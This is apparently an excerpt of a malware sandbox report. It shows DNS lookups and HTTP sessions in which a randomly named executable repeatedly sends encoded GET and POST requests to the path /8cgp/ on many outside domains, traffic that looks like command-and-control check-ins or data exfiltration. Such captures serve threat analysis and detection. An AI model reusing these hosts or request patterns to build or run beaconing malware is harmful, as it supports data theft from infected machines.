Apr 24, 2024 12:35:18.585218906 CEST | 192.168.11.20 | 1.1.1.1 | 0x598e | Standard query (0) | www.mxgovonline.com | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:35:34.536056995 CEST | 192.168.11.20 | 1.1.1.1 | 0x4445 | Standard query (0) | www.fashionagencylab.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 24, 2024 12:27:26.964096069 CEST | 1.1.1.1 | 192.168.11.20 | 0x348b | No error (0) | absorbante-calitate.ro | | 37.251.143.215 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:27:59.547804117 CEST | 1.1.1.1 | 192.168.11.20 | 0xf9f | No error (0) | www.arilyfarlico.ru | | 51.77.215.151 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:28:20.532402992 CEST | 1.1.1.1 | 192.168.11.20 | 0x70d3 | No error (0) | www.donantedeovulos.space | | 64.190.62.22 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:28:34.858701944 CEST | 1.1.1.1 | 192.168.11.20 | 0x730e | Name error (3) | www.lfsig.autos | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:28:43.076395988 CEST | 1.1.1.1 | 192.168.11.20 | 0x3013 | Name error (3) | www.muslimsmat.com | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:28:51.831527948 CEST | 1.1.1.1 | 192.168.11.20 | 0x52f | No error (0) | www.kader42.top | | 108.186.8.155 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:29:05.536655903 CEST | 1.1.1.1 | 192.168.11.20 | 0x6af | No error (0) | www.noispisok.com | noispisok.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 12:29:05.536655903 CEST | 1.1.1.1 | 192.168.11.20 | 0x6af | No error (0) | noispisok.com | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:29:20.414931059 CEST | 1.1.1.1 | 192.168.11.20 | 0x2e79 | No error (0) | www.kansaiwoody.com | | 118.27.122.214 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:29:34.872594118 CEST | 1.1.1.1 | 192.168.11.20 | 0x2e52 | No error (0) | www.a-two-spa-salon.com | | 157.7.107.63 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:29:49.234477997 CEST | 1.1.1.1 | 192.168.11.20 | 0xbca5 | Name error (3) | www.mxgovonline.com | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:29:57.468009949 CEST | 1.1.1.1 | 192.168.11.20 | 0x31fb | No error (0) | www.techfun.info | | 203.161.49.193 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:30:11.418248892 CEST | 1.1.1.1 | 192.168.11.20 | 0x4203 | No error (0) | www.ogunlewefamily.org.ng | ogunlewefamily.org.ng | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 12:30:11.418248892 CEST | 1.1.1.1 | 192.168.11.20 | 0x4203 | No error (0) | ogunlewefamily.org.ng | | 67.225.140.26 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:30:25.793375969 CEST | 1.1.1.1 | 192.168.11.20 | 0x769e | No error (0) | www.387mfyr.sbs | | 137.220.252.40 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:30:40.030802965 CEST | 1.1.1.1 | 192.168.11.20 | 0xeeb7 | No error (0) | www.nurenose.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 12:30:40.030802965 CEST | 1.1.1.1 | 192.168.11.20 | 0xeeb7 | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:30:54.959846020 CEST | 1.1.1.1 | 192.168.11.20 | 0x2649 | No error (0) | www.lm2ue.us | | 91.195.240.123 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:31:09.777997017 CEST | 1.1.1.1 | 192.168.11.20 | 0xfd80 | Name error (3) | www.weave.game | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:31:18.368974924 CEST | 1.1.1.1 | 192.168.11.20 | 0xcbb0 | No error (0) | www.whjzff.com | | 173.232.100.113 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:31:55.112828016 CEST | 1.1.1.1 | 192.168.11.20 | 0x2fe8 | Name error (3) | www.lfsig.autos | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:32:03.342045069 CEST | 1.1.1.1 | 192.168.11.20 | 0x176f | Name error (3) | www.muslimsmat.com | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:33:07.423139095 CEST | 1.1.1.1 | 192.168.11.20 | 0x22c8 | Name error (3) | www.mxgovonline.com | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:33:29.591080904 CEST | 1.1.1.1 | 192.168.11.20 | 0xb896 | No error (0) | www.badai77resmi.net | badai77resmi.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 12:33:29.591080904 CEST | 1.1.1.1 | 192.168.11.20 | 0xb896 | No error (0) | badai77resmi.net | | 159.100.14.108 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:33:43.946839094 CEST | 1.1.1.1 | 192.168.11.20 | 0x564f | Name error (3) | www.mxgovonline.com | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:33:52.228579044 CEST | 1.1.1.1 | 192.168.11.20 | 0x4a80 | No error (0) | www.concretedailypress.net | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 12:33:52.228579044 CEST | 1.1.1.1 | 192.168.11.20 | 0x4a80 | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:34:06.538747072 CEST | 1.1.1.1 | 192.168.11.20 | 0x15af | No error (0) | www.berryandbird.co.uk | berryandbird.co.uk | | CNAME (Canonical name) | IN (0x0001) | false
Apr 24, 2024 12:34:06.538747072 CEST | 1.1.1.1 | 192.168.11.20 | 0x15af | No error (0) | berryandbird.co.uk | | 76.223.105.230 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:34:06.538747072 CEST | 1.1.1.1 | 192.168.11.20 | 0x15af | No error (0) | berryandbird.co.uk | | 13.248.243.5 | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:34:20.156210899 CEST | 1.1.1.1 | 192.168.11.20 | 0x64db | Name error (3) | www.weave.game | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:34:45.182399035 CEST | 1.1.1.1 | 192.168.11.20 | 0xaaf7 | Name error (3) | www.lfsig.autos | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:34:50.353069067 CEST | 1.1.1.1 | 192.168.11.20 | 0xa98 | Name error (3) | www.muslimsmat.com | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:35:18.752221107 CEST | 1.1.1.1 | 192.168.11.20 | 0x598e | Name error (3) | www.mxgovonline.com | none | none | A (IP address) | IN (0x0001) | false
Apr 24, 2024 12:35:34.703178883 CEST | 1.1.1.1 | 192.168.11.20 | 0x4445 | Name error (3) | www.fashionagencylab.com | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 50245 | 51.77.215.151 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 12:27:59.857388020 CEST | 392 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.arilyfarlico.ru
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Apr 24, 2024 12:28:00.163288116 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                    Date: Wed, 24 Apr 2024 10:28:00 GMT
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Content-Length: 20
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                                                    Data Ascii: Unknown request type


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 50246 | 64.190.62.22 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 12:28:20.846646070 CEST | 686 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=5pmLN48gKrEf6KTnHGf1KxOYjdwyp+SceQ7J44gLAkR2BRaj3ZfBcV8CKVEFmQCB83Rx/o99b7Gu9rFakgoZUMmO2cI96iz96Ad/nUSaYZQ0n8pfoKWIHP+hMMquOxmCfvdi3z+3hnjTvGEecpoyi0K+DYrQQWnXjnOH0KyI2xYlBzNKWC0lqhNq+xO0LP9q4g==
Apr 24, 2024 12:28:21.157947063 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:28:21 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 50247 | 64.190.62.22 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 12:28:23.677385092 CEST | 1026 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Apr 24, 2024 12:28:23.988703966 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:28:23 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 50248 | 64.190.62.22 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 12:28:26.524324894 CEST | 12890 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:28:26.838046074 CEST | 299 | IN | HTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:28:26 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.11.20 | 50249 | 64.190.62.22 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:28:29.363822937 CEST | 398 | OUT | GET /8cgp/?Xh9lX=0rOrON9KCedqtp/KEErYODOsqb1Ol5SKTVjby8oNAnBpXQ3f6KiEeGIyIQ0Oonef/1tP4f58WruRrbReuj87L8qx+pUtt26y1FhkvVaaULxp4u5kv8q4N/k=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.donantedeovulos.space
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:28:29.675548077 CEST | 107 | IN | HTTP/1.1 439
                                                                    date: Wed, 24 Apr 2024 10:28:29 GMT
                                                                    content-length: 0
                                                                    server: NginX
                                                                    connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.11.20 | 50250 | 108.186.8.155 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:28:52.014128923 CEST | 656 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:28:52.193074942 CEST | 240 | IN | HTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:28:51 GMT
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.11.20 | 50251 | 108.186.8.155 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:28:54.724514961 CEST | 996 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:28:54.902451992 CEST | 240 | IN | HTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:28:53 GMT
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.11.20 | 50252 | 108.186.8.155 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:28:57.424940109 CEST | 2578 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kader42.top
                                                                    Origin: http://www.kader42.top
                                                                    Referer: http://www.kader42.top/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:28:57.599301100 CEST1289OUTData Raw: 2b 63 51 6e 4f 48 72 6c 6e 6b 69 76 51 6c 6f 51 32 4a 6a 47 6f 6f 6e 4f 63 48 7a 4e 2b 35 74 31 63 59 42 79 49 74 69 71 59 62 72 4e 58 4f 31 75 55 78 63 62 66 73 2b 51 33 6d 78 49 55 5a 67 4d 5a 49 61 37 52 44 49 6c 36 4c 39 7a 38 4e 67 6d 53 42
                                                                    Data Ascii: +cQnOHrlnkivQloQ2JjGoonOcHzN+5t1cYByItiqYbrNXO1uUxcbfs+Q3mxIUZgMZIa7RDIl6L9z8NgmSBl6zPCv+3xGMEVTLzNxiwHQybD4tz+QUaAASD/cWW2GWvQr5icm6x9EszT120516eVBXJzZ+dwauBm8c89sRgsrhR/mc1Qc0SdVKb/hYeS6wnjb2l4feToNvhsEo7CP4q9OUPZJdKcy7SoEn93Xd1PHO5IdWlli6rK
                                                                    Apr 24, 2024 12:28:57.599489927 CEST19335OUTData Raw: 77 2f 78 79 32 4b 39 2f 50 48 76 54 33 39 4f 77 4a 38 4d 2f 4a 63 64 75 76 6f 54 45 65 4b 75 41 79 70 7a 4e 68 56 66 34 31 31 52 65 34 4c 54 37 57 56 50 73 47 2b 4f 44 4c 6e 6f 57 4a 39 71 5a 72 58 34 35 46 32 66 4d 4b 59 4e 39 6e 73 5a 72 62 52
                                                                    Data Ascii: w/xy2K9/PHvT39OwJ8M/JcduvoTEeKuAypzNhVf411Re4LT7WVPsG+ODLnoWJ9qZrX45F2fMKYN9nsZrbRdK7AdqK1F0MIW73XYvUXu2Uz4A/OoTTpXN0rqNeMLb6xBOlfkVDnlAmtbIO60CvgYwh5g9OZSvV3BgCSL8U/nDRPfgYFLY8szY+atRpPWqvr6apHSQUKxTk3csse+gK1aMB4i13BaoXawGxktPa+lryRO+SY/HSPw
                                                                    Apr 24, 2024 12:28:57.599994898 CEST | 240 | IN | HTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Encoding: gzip
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:28:57 GMT
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.11.20 | 50253 | 108.186.8.155 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:00.127063036 CEST | 388 | OUT | GET /8cgp/?QDnH=ERXP8&Xh9lX=TrWImKkXg72XbxtkItxdCHOg9XWXWDqE4iO1qHTBwn9T3tQecLtkumbZqYeYuSkxtGpQmOvVFI5PSbSpBsnHilSWnmtQ3orkxGs2pUIdqKkLQC6qurdmbFs= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.kader42.top
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:29:00.302531004 CEST | 209 | IN | HTTP/1.1 200 OK
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                    X-Powered-By: Nginx
                                                                    Date: Wed, 24 Apr 2024 10:29:00 GMT
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.11.20 | 50254 | 84.32.84.32 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:05.871361017 CEST | 662 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.11.20 | 50255 | 84.32.84.32 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:08.738596916 CEST | 1002 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.11.20 | 50256 | 84.32.84.32 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:11.595972061 CEST | 3867 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.noispisok.com
                                                                    Origin: http://www.noispisok.com
                                                                    Referer: http://www.noispisok.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    12 | 192.168.11.20 | 50257 | 84.32.84.32 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:14.456446886 CEST | 390 | OUT | GET /8cgp/?Xh9lX=/YVHZOSW055QRFdzHV7EG4MPV06WciwOGAsmatOqDuiKItV6nqBs0pBRyzlLrNgNpWUhFR7Gbz8/7vzQvyrSOcbiMu9Z7oEFzfRxNbVqKIwXHjZvBpZwwR0=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.noispisok.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:29:14.791452885 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                    Server: hcdn
                                                                    Date: Wed, 24 Apr 2024 10:29:14 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 10072
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: 2263d4edde37265b9a8116c3fad9983b-asc-edge4
                                                                    Expires: Wed, 24 Apr 2024 10:29:13 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    13 | 192.168.11.20 | 50258 | 118.27.122.214 | 80 | 7240 | C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Apr 24, 2024 12:29:20.690680981 CEST | 668 | OUT | POST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.kansaiwoody.com
                                                                    Origin: http://www.kansaiwoody.com
                                                                    Referer: http://www.kansaiwoody.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Ascii: Xh9lX=Ff+IoCJIoBgLrkGQMcJeEENjXbUpkFN3M2n+vQl4WKRRj70PPhQMuw2qAClmZyL3vfnMAxB3QgpOvF1cboP2FF+oyCmjS8S5GkXx2oMa6AkqR25z73MSzvg+lVhrE4ukfdjToPimmHi+0Rj+tJYRIUyCy01dlmsnMVRnYY5iQ1Ng2uwiyuGr/C5Nsq7Xuw8xJA==
                                                                    Apr 24, 2024 12:29:20.973213911 CEST | 377 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:29:20 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
